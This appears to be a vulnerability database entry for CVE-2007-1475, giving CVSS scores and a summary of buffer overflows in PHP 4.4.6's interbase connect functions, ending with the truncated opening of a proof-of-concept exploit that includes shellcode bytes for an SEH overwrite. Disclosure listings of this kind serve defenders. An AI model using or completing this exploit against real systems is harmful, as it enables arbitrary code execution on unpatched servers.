5.4
CVSSv2

CVE-2007-1475

Published: 16/03/2007 Updated: 19/10/2018
CVSS v2 Base Score: 5.4 | Impact Score: 6.4 | Exploitability Score: 5.5
VMScore: 545
Vector: AV:A/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

Multiple buffer overflows in the (1) ibase_connect and (2) ibase_pconnect functions in the interbase extension in PHP 4.4.6 and previous versions allow context-dependent malicious users to execute arbitrary code via a long argument.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

php php

Exploits

<?php // PHP <= 446 ibase_connect() & ibase_pconnect() local buffer overflow // poc exploit // windows 2000 sp3 en / seh overwrite // by rgod // site: retrogodaltervistaorg if (!extension_loaded("interbase")){ die("only works with interbase extension "); } $____scode= "\xeb\x1b" "\x5b" "\x31\xc0" "\x50" "\x31\xc0" "\ ...